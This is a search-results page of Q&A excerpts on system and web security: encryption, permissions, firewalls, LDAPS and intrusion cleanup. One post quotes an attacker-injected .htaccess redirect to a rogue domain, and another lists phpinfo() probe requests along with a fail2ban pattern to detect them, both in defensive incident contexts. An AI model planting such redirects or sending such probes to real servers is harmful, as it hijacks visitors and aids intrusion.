Search Results

Search found 16593 results on 664 pages for 'adf security deploy'.

Page 165/664

  • My Windows 7 is exposing my files, and I am the only administrator.

    - by Connie
    I am the only administrator on my Windows 7 Asus X53E series laptop. Why is a standard user able to access my files just by searching my name in the Start menu? If I log into the guest account and search my name, it shows an error that I don't have permission. But when I log into my roommate's standard account, go to the Start menu, and put my name in the search box, everything I have done or searched for is open to them. How can I make my administrator account private?

    Read the article

  • What are the current options to encrypt a partition on Mac OS X?

    - by symbion
    I recently got my laptop stolen with some sensitive information on it (personal source code, bank details in a secure file, passwords, etc.) and I learnt the lesson: encrypt your sensitive data. Now, I am wondering what the options are to encrypt a partition (not an encrypted disk image).
    Aim: the aim is to prevent anyone (except me) from accessing that data.
    Requirement 0: the software must be able to encrypt a non-system partition.
    Requirement 1: plausible deniability is required, but preventing cold boot attacks is not an absolute requirement (I am not famous enough, nor is my info sensitive enough, to need that).
    Requirement 2: software taking advantage of AES hardware encryption is very welcome, as I intend to get a MacBook Pro with an i7 CPU (with AES-NI instructions). I will have a virtual machine running in the encrypted partition.
    Requirement 3: free or reasonably cheap.
    Requirement 4: the software must run on Mac OS X Snow Leopard or Lion.
    So far, TrueCrypt is the only option I have found. Regards,

    Read the article

  • Is there some file browser that uses low-level functions to browse the hard disk?

    - by watbywbarif
    I have Windows 7 on an NTFS hard disk. I have detected rootkit files but can't delete them through Windows Explorer, obviously because they are not visible. Is there some other file browser that uses low-level function calls, lower than the Win API, so that I can try to see and study these files before removal? I know the exact locations. I know that I can boot some live CD and delete them, but I wonder about the first possible solution.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the Apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this:

        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://
        RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
        RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    Googling for that URL (which is the MD5 hash of "antivirus") I discovered that this same thing happened all over the internet, and I am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined:
    - the changes were made as www-data, so Apache or its plugins are likely the culprit
    - all the changes were made within 15 minutes of each other, so it was probably automated
    - since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
    - if an .htaccess file already existed and was writable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)
    Any more hints would be appreciated.
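
    A rough starting point for the cleanup, sketched in shell. It assumes GNU grep/sed and that every document root lives under /var/www; adjust both to your layout.

        #!/bin/sh
        # List every .htaccess that references the rogue domain, keep a copy of each
        # for forensics, then strip the injected RewriteRule line. The RewriteCond/
        # RewriteEngine lines it added are inert on their own; review them against
        # the .bak copies before removing them by hand.
        grep -rl --include='.htaccess' '84f6a4eef61784b33e4acbd32c8fdd72\.com' /var/www |
        while read -r f; do
            cp "$f" "$f.bak"
            sed -i '/84f6a4eef61784b33e4acbd32c8fdd72\.com/d' "$f"
        done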

    Read the article

  • How intrusive is using a VPN?

    - by Slade
    My company lets us work from home sometimes using VPN (during weather emergencies and such). When logging in, a big window comes up saying that the network is private and for employees only, and that there is no right to privacy while using the VPN. It makes sense that they don't want people poking around their network, but I wonder whether the company can use the connection to look around my computer while I'm connected. I'm not entirely computer-illiterate, but I'm not a networks person at all, so the technical documents I've found don't help me. Is that possible, and if so, to what degree?
    UPDATE: Thanks Mark. The funneling thing is what I was really asking about. Mostly I was worried that I would already have some IM conversation open, or log into eBay forgetting that the VPN was open, and that my company's IT people would see it or log my eBay password. Thanks again.
    ANOTHER UPDATE: What if my son wants to play online poker or Warcraft etc. while I have the VPN on to work? Could my company think I'm the one playing if I am not typing often?

    Read the article

  • Mysterious visitor to hidden PHP page

    - by B. VB.
    On my website, I have a "hidden" page that displays a list of the most recent visitors. There exist no links at all to this single PHP page and, theoretically, only I know of its existence. I check it many times per day to see what new hits I have. However, about once a week, I get a hit from a 208.80.194.* address on this supposedly hidden page (it records hits to itself). The strange thing is this: this mysterious person/bot does not visit any other page on my site - not the public PHP pages, only this hidden page that prints the visitors. It's always a single hit, and the HTTP_REFERER is blank. The other data is always some variation of Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4; yplus 5.1.04b), but sometimes MSIE 6.0 instead of 7, and various other plug-ins. The browser string is different every time, as are the lowest-order bits of the address. And it's just that: one hit per week or so, to that one page. Absolutely no other pages are touched by this mysterious visitor. Doing a whois on that IP address showed it's from the New York area, from the "Websense" ISP. The lowest-order 8 bits of the address are always different, but it is always from 208.80.194.*. From most of the computers from which I access my website, a traceroute to my server does not pass through any router with an IP in 208.80.*, so I would think that rules out any kind of HTTP sniffing. I have NO idea how or why this is happening. Does anyone have any clue, or has anyone seen something as strange as this before? It seems completely benign, but unexplainable and a little creepy. Thanks in advance!

    Read the article

  • File permissions on web server

    - by plua
    I have just read this useful article on file permissions, and I am about to implement an as-strict-as-possible file permissions policy on our webserver. Our situation: we have a web server accessed through SFTP by different users from within our company, and we have the general public accessing Apache - sometimes uploading files through PHP. I distinguish folders and files by their use. So based on this reading, here is my plan (a shell sketch of it follows below). All people who need to upload files will have separate users, but all of those users will belong to two groups: uploaders and webserver. Apache will belong to the group webserver.
    Directories - permission: 771, owner: user:uploaders. Explanation: to access files in the folder, everybody needs execute permission. Only uploaders will be adding/removing files, so they also get r+w permission.
    Files within the web root - permission: 664, owner: user:uploaders. Explanation: they will be uploaded and changed by different users, so both owner and group need w+r permission. The webserver only needs to read files, so r permission only.
    Upload directories - permission: 771, owner: user:webserver. Explanation: when files need to be uploaded, Apache needs to be able to write to this directory. But I figure it is safer to change the group to webserver, thus giving Apache sufficient privileges (and all uploaders also belong to this group and will have the same permissions), while safeguarding against "others" writing to this folder.
    Uploaded files - permission: 664, owner: user:webserver. Explanation: after uploading, Apache might need to delete files, but this is no problem because it has w+r permission on the folder. So there is no need to make this file any more accessible than r access for the group.
    Being not an expert on file permissions, my question is whether or not this is the best possible policy for our situation? Any suggestions welcome.
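
    A minimal shell sketch of that plan; the user alice, the Apache user www-data, and the path /var/www/site are placeholders to adapt.

        #!/bin/sh
        groupadd uploaders
        groupadd webserver
        usermod -a -G uploaders,webserver alice   # repeat for each uploading user
        usermod -a -G webserver www-data          # the Apache user

        # web root: owned by an uploader, group uploaders
        chown -R alice:uploaders /var/www/site
        find /var/www/site -type d -exec chmod 771 {} +
        find /var/www/site -type f -exec chmod 664 {} +

        # upload directory: group webserver so Apache/PHP can write into it
        chown -R alice:webserver /var/www/site/uploads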

    Read the article

  • Linux File Permissions & Access Control Query

    - by Jason
    Hi, let's say I am user bob in group users. There is this file:

        -rw----r-- 1 root users 4 May 8 22:34 testfile

    First question: why can't bob read the file when it is readable by others? Is it simply that if you are denied by the group bits, then you are automatically excluded from the "other" class? I always assumed that the final 3 bits took precedence over the user/group permission bits; guess I was wrong... Second question: how is this implemented? I suppose it's linked to the first query, but how does this work in relation to access control - is it related to how ACLs work / are queried? I'm just trying to understand how these 9 permission bits are actually implemented/used in Linux. Thanks a lot.
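
    A quick way to see the ordering in action, as a root shell sketch (it assumes a user bob and a group users exist, as in the question):

        #!/bin/sh
        # The kernel picks exactly one class per process - owner, else group, else
        # other - and checks only that class's bits; it never falls through.
        touch /tmp/testfile
        chown root:users /tmp/testfile
        chmod 604 /tmp/testfile                # -rw----r--
        su bob -c 'cat /tmp/testfile'          # "Permission denied": bob matches the
                                               # group class, so the o+r bit is never consulted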

    Read the article

  • Strategy/insights for avoiding document content loss due to encryption

    - by pbernatchez
    I'm about to encourage a group of people to begin using S/MIME and GPG for digital signatures and encryption. I foresee a nightmare of encrypted documents which can no longer be recovered because of lost keys. The thorniest issue is archiving. The natural way to preserve privacy in an archive is to archive the encrypted document, but that opens us up to the risk of a lost key, or a forgotten passphrase, when the time comes to unarchive a document - after all, that will be a long way in the future. That would be equivalent to having destroyed the document. My first thought is archiving keys with the documents, but that still leaves the forgotten passphrase. Archiving the passphrase too would be tantamount to archiving in the clear: no privacy. What approaches do you use? What insights can you offer on the issue?
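
    One common mitigation, sketched here with GnuPG (the key IDs are placeholders): encrypt each archived document to its owner and to an offline escrow/recovery key, so that either private key can recover it.

        #!/bin/sh
        gpg --encrypt \
            --recipient alice@example.org \
            --recipient archive-escrow@example.org \
            contract.pdf        # writes contract.pdf.gpg, decryptable by either key

    The escrow key and its passphrase can then be stored offline (for example split between a safe and a second custodian), so no single forgotten passphrase destroys the archive.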

    Read the article

  • Allow outgoing connections for DNS

    - by Jimmy
    I'm new to iptables, but I am trying to set up a secure server to host a website and allow SSH. This is what I have so far:

        #!/bin/sh
        i=/sbin/iptables

        # Flush all rules
        $i -F
        $i -X

        # Setup default filter policy
        $i -P INPUT DROP
        $i -P OUTPUT DROP
        $i -P FORWARD DROP

        # Respond to ping requests
        $i -A INPUT -p icmp --icmp-type any -j ACCEPT

        # Force SYN checks
        $i -A INPUT -p tcp ! --syn -m state --state NEW -j DROP

        # Drop all fragments
        $i -A INPUT -f -j DROP

        # Drop XMAS packets
        $i -A INPUT -p tcp --tcp-flags ALL ALL -j DROP

        # Drop NULL packets
        $i -A INPUT -p tcp --tcp-flags ALL NONE -j DROP

        # Stateful inspection
        $i -A INPUT -m state --state NEW -p tcp --dport 22 -j ACCEPT

        # Allow established connections
        $i -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

        # Allow unlimited traffic on loopback
        $i -A INPUT -i lo -j ACCEPT
        $i -A OUTPUT -o lo -j ACCEPT

        # Open nginx
        $i -A INPUT -p tcp --dport 443 -j ACCEPT
        $i -A INPUT -p tcp --dport 80 -j ACCEPT

        # Open SSH
        $i -A INPUT -p tcp --dport 22 -j ACCEPT

    However, I've locked down my outgoing connections and it means I can't resolve any DNS. How do I allow that? Also, any other feedback is appreciated. James
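
    A minimal sketch of the missing piece, appended to the same script (it reuses its $i variable): since the INPUT chain already accepts ESTABLISHED,RELATED traffic, letting the queries out is enough. DNS needs UDP port 53, plus TCP port 53 for large responses and zone transfers.

        # Allow outbound DNS; optionally add "-d <resolver IP>" to restrict the
        # queries to your own resolvers.
        $i -A OUTPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
        $i -A OUTPUT -p tcp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT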

    Read the article

  • Windows - Decrypt encrypted file when user account is destroyed

    - by dc2
    I have a virtual machine running on my Windows Server 2008 computer. Its files were already encrypted when I received them, as the builder of the VM did it on a Mac, which decrypts files by default. I never thought to decrypt these files, as they automatically "decrypt" when you have permission over them, so the VM has been running for over a year despite the encryption. I just upgraded my computer to a domain controller (dcpromo.exe). Now when I try to access/run the VM, I can't, because I don't have permission to decrypt the files: that permission belonged to another logon (the local administrator), and now I am the domain administrator. Apparently the local admin is totally nuked when you upgrade to domain controller. I have tried EVERYTHING: taking ownership of the files, which works but doesn't do anything for me, and adding full control for everyone on the files. I go to File Properties > Advanced > Details (under encryption) > Users who can access this file. The only user is administrator@localcomputername, and there is a cert number. I try adding a new cert; I don't have permission. I don't have permission to decrypt the file (access is denied) or to copy the file to another computer (access denied). I am totally stumped, and this VM is a production machine that needs to be up right now. Does anyone have any ideas?

    Read the article

  • Securing communication between two Linux servers on a local network for ports only they need access to

    - by gkdsp
    I have two Linux servers connected to each other via a cross-connect cable, forming a local network. One of the servers presents a DMZ for the other server (e.g. a database server) that must be very secure. I'm restricting this question to communication between the two servers on ports that only need to be available to these servers (and no one else). Thus, communication between the two servers can be established by either: (1) opening the required port(s) on both servers and authenticating according to the applications' rules, or (2) disabling iptables on the NICs the cross-connect cable is attached to (on both servers). Which method is more secure? In the first case, the needed ports are open to the external world, but protected by user name and password. In the second case, none of the needed ports are open to the outside world, but since iptables is disabled for the NICs on the cross-connect cable, essentially all ports may be considered "open" between the two servers (so if the server providing the DMZ is compromised, the attacker on that server could reach every port over the cross-connect cable). Is there any conventional wisdom on how to make communication secure between two servers for ports only these servers need access to?
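
    A third option, sketched below, keeps iptables enabled on the cross-connect NIC but opens only the specific service to the peer. The interface eth1, the peer address, and the MySQL port are all assumptions to adapt.

        #!/bin/sh
        i=/sbin/iptables
        PEER=10.0.0.2                       # the other server on the cross-connect

        # allow only the one service, only from the peer, only on the private NIC
        $i -A INPUT -i eth1 -s "$PEER" -p tcp --dport 3306 \
           -m state --state NEW,ESTABLISHED -j ACCEPT
        $i -A INPUT -i eth1 -j DROP         # everything else on that NIC is dropped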

    Read the article

  • What statistics app should I use for my website?

    - by Camran
    I have my own server (with root access). I need statistics on the users who visit my website, etc. I have looked at an app called Webalizer... is this a good choice? I run apache2 on an Ubuntu 9.x system... If you know of any good statistics apps for servers, please let me know. And a follow-up question: all statistics are saved in log files, right? So how large would these log files become? The possibility to split them would be good; I don't know if this is possible with Webalizer though...
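
    On the follow-up question: Webalizer just reads the Apache access log, so log growth is normally handled by logrotate rather than by the statistics tool, and Ubuntu already rotates the Apache logs out of the box. A sketch of what such a logrotate stanza looks like (the values are illustrative only):

        /var/log/apache2/*.log {
            weekly
            rotate 52
            compress
            delaycompress
            missingok
            notifempty
        }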

    Read the article

  • How to troubleshoot this memory usage?

    - by Camran
    I have a classifieds website. I use PHP, MySQL, and Solr. Solr runs in a servlet container, in my case Jetty, which is a Java application. I just noticed that something was terribly wrong on my website. I opened the terminal, entered the "top" command, and noticed that the java process was eating all the CPU and memory. Now I thought, "OK, maybe I need more memory and CPU", so I increased them. But along with the increase, the Java app started eating more. This has never happened before, and it is either a bug or a hack of some kind. Anyway, I need to troubleshoot this now, so I wonder how I do that. Can I somehow pinpoint, from some error log, exactly when the memory usage started to go up? How does one troubleshoot this? How do I prevent it? Is it possible to prevent too many requests somehow, if they are within a timeline? Thanks
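
    A rough sketch of how to start narrowing down a runaway JVM, assuming the JDK tools (jstat, jmap) are installed alongside the JRE running Jetty:

        #!/bin/sh
        PID=$(pgrep -f jetty | head -n 1)       # PID of the Jetty/Solr JVM

        jstat -gcutil "$PID" 5000               # heap occupancy and GC activity every 5 s:
                                                # a heap pinned near 100% with constant GC
                                                # points at cache sizes or query load
        jmap -histo:live "$PID" | head -n 30    # which object types are holding the heap

    If Jetty's request log is enabled, correlating its timestamps with when the growth started usually shows whether a burst of requests set it off; rate limiting such bursts is then a job for a frontend proxy or firewall rather than for Solr itself.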

    Read the article

  • How to securely connect to multiple different LDAPS servers (Debian)

    - by Pickle
    I'm trying to connect to multiple different LDAPS servers. A lot of the documentation I've seen recommends setting TLS_REQCERT never, but that strikes me as horribly insecure: the certificate is never verified at all. So I've set that to demand. All the documentation I've seen says I need to update ldap.conf with a TLS_CACERT directive pointing to a .pem file. I've got that .pem file set up with the certificate from LDAP server #1, and ldaps connections are happening fine. I've now got to communicate securely with another LDAP server, in another branch of my organization, that uses a different certificate. I've seen no documentation on how to do this, except one page that says I can simply put multiple (not chained) certificates in the same .pem file. I've done this and everything is working hunky-dory. However, when I told a colleague what I did, he sounded like the sky was falling: putting two non-chained certificates into one .pem file is apparently the worst thing since... ever. Is there a more acceptable way to do this? Or is this the only accepted way?
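
    For what it's worth, a CA bundle is exactly that - several independent CA certificates concatenated into one PEM file - so the practice itself is normal. Two sketches, assuming the OpenLDAP client libraries and that ca1.pem and ca2.pem are the CA certificates for the two directories (the file names and paths are placeholders):

        #!/bin/sh
        # Option 1: one bundle file, pointed to by TLS_CACERT in ldap.conf
        cat ca1.pem ca2.pem > /etc/ldap/cacerts.pem

        # Option 2: a hashed directory, pointed to by TLS_CACERTDIR in ldap.conf
        # (OpenSSL-linked builds expect the hash links that c_rehash creates)
        mkdir -p /etc/ldap/cacerts
        cp ca1.pem ca2.pem /etc/ldap/cacerts/
        c_rehash /etc/ldap/cacerts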

    Read the article

  • Use .htaccess to block *all* access to specific folders.

    - by Urda
    I am not sure how to do this, but I want to block all access to a specific set of folders on my web server, say secret01 and secret02...

        homeDir
        |- data
        |- www
        |  |- .htaccess (file)
        |  |- images
        |  |- js
        |  |- secret01
        |  |- secret02
        |  |...
        |...

    What rule(s) do I need to add to my root .htaccess file to do this? I want all access from the web blocked from going into these folders, period. The only way one could get to them would be over SFTP or SSH. So what rule am I looking for? I am preferably looking for a one-liner so I can add more folders or move it to another site down the road. I really would prefer the rule to be placed in the root .htaccess file so I don't have to jump all over the place to lock and unlock folders.
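
    One possible one-liner for the www/.htaccess shown above, as a sketch (mod_alias assumed; extend the alternation with more folder names as needed):

        RedirectMatch 404 ^/(secret01|secret02)(/|$)

    Every web request for those paths then gets a 404, so the folders simply appear not to exist, while SFTP/SSH access is unaffected because Apache is not involved there. The classic alternative is a per-folder .htaccess containing "Deny from all" (or "Require all denied" on Apache 2.4), but that returns 403 and needs a file in every folder.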

    Read the article

  • Member of local Administrators group cannot elevate

    - by fixme
    Hi. We have just installed the first Windows 7 (Professional) workstation in our domain. Its primary user has been added to the local (computer's) Administrators group (computername\Administrators). Still, whenever elevation is needed, his credentials are not accepted, and he is never allowed to act as an administrator. For example, he cannot write a file to C:\ (not that he needs to, but it illustrates the problem). Putting him in the domain's Administrators group doesn't help either (and anyway we'd rather not do that). I suspect that he may be the victim of some policy that controls elevation, but I can't seem to find it. Can anyone shed some light?

    Read the article

  • Is there any valid reason for users to request phpinfo()?

    - by The Journeyman geek
    I'm working on writing a set of rules for fail2ban to make life a little more interesting for whoever is trying to brute-force his way into my system. A good majority of the attempts tend to revolve around trying to get at phpinfo() via my webserver, as below:

        GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
        GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
        GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
        GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1

    I'm wondering if there's any valid reason for a user to attempt to access phpinfo() via Apache, since if not, I can simply use that - or more specifically the regex GET //[^>]+=phpinfo\(\) - as a filter to eliminate these attacks.
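
    If the decision is to treat any phpinfo() request as hostile, a sketch of what the fail2ban side could look like (the filter name, log path, and ban settings are placeholders to adapt; the regex mirrors the one above and assumes the standard combined access-log format, where the client IP is the first field):

        # /etc/fail2ban/filter.d/apache-phpinfo.conf (sketch)
        [Definition]
        failregex = ^<HOST> .*"GET [^"]*=phpinfo\(\)
        ignoreregex =

        # added to /etc/fail2ban/jail.local (sketch)
        [apache-phpinfo]
        enabled  = true
        port     = http,https
        filter   = apache-phpinfo
        logpath  = /var/log/apache2/access.log
        maxretry = 1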

    Read the article

  • Dangers of the Python eval() statement

    - by LukeP
    I am creating a game - specifically, a Pokemon battle simulator. I have an SQLite database of moves in which a row looks something like:

        name | type | Power | Accuracy | PP | Description

    However, there are some special moves. For these special moves, their damage (and other attributes not shown above, like status effects) may be dependent on certain factors. Rather than create a huge if/else in one of my classes covering the formulas for every one of these moves, I'd rather include another column in the DB that contains a formula in string form, like 'self.health/2' (simplified example). I could then just plug that into eval(). I always see people saying to stay away from eval, but from what I can tell this would be considered an acceptable use, as the dangers of eval only come into play when accepting user input. Am I correct in this assumption, or is there something I'm not seeing?

    Read the article

  • Taking a user out of the MACHINENAME\Users group does not prevent them from authenticating with an IIS site

    - by jayrdub
    I have a site that has anonymous access disabled and uses only IIS basic authentication. The site's home directory only has the MACHINENAME\Users group with permissions. I have one user that I don't want to be able to log-in to this site, so I thought all I would need to do is take that user out of the Users group, but doing so still allows him to authenticate. I know it is the Users group that is allowing authentication because if I remove that group's permissions on the directory, he is not allowed to log in. Is there something special about the Users group that makes it so you are actually always a part of it? Is the only solution to revoke the Users group's permissions on the site's home directory and grant a new group access that contains only the allowed users?

    Read the article

  • Outbound ports to allow through firewall - core requirements

    - by dunxd
    This question was asked before, but in a rather general way. I'm asking more specifically based on my current requirements. We have a number of remote offices made up of a bunch of PCs and an ASA 5505 which is used as firewall and VPN termination point. In the offices we share the internet connection with one or more other organisations over whom we have very little control, aside from the config on the ASAs. For a bunch of reasons I'd like to lock down these ASA 5505s to only allow outbound traffic to ports used by applications we know we need. I'm putting together a standard config to roll out to all the ASAs, and if we need to open up ports for the other orgs we can do it on request. But I want to leave open the most commonly required ports so we can get up and running without waiting on other folks' technical staff to get back. I plan to allow the following TCP ports to support email and web access, which I know everyone will need:
    - POP3 (110 and 995)
    - HTTP (80 and 443)
    - IMAP4 (143 and 993)
    - SMTP (25 and 465)
    The question really is, what other ports do I need to leave open to allow for "normal" working? I've seen UDP port 53 for DNS as one. Are there any others that would be worth opening up? Just to note: I'll also be setting up monitoring systems to keep an eye on the ports we do allow; any of the above could be misused of course. We'll also back all this up with signed agreements. But I'm aiming for a technical solution where I don't have to start out with the full requirements of everyone we share connections with. See also: outbound ports that are always open

    Read the article
